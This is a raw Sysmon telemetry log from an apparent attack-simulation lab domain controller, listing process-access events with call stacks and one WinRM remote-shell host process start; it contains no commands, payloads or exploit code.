15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000645Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000644Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000643Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000642Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C43-5FA1-1403-000000008701}4452C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000641Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000640Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.091{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C43-5FA1-1403-000000008701}4452C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000639Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.094{D28789B6-7C43-5FA1-1403-000000008701}4452C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C43-5FA1-7F57-110000000000}0x11577f0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7AD1-5FA1-0C00-000000008701}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000638Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.075{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000637Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.075{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000636Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.075{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000635Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:27.013{D28789B6-7C20-5FA1-4002-000000008701}24204476C:\Windows\servicing\TrustedInstaller.exe{D28789B6-7C20-5FA1-4102-000000008701}3140C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+6eb98|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000926Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.972{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000925Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.972{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000924Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.972{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000923Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.972{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000922Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.972{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000921Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.957{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000920Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.957{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000919Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.957{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000918Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.957{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000917Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.957{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000916Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.957{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000915Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.957{D28789B6-7C64-5FA1-0C00-000000008801}608920C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000914Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.957{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000913Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 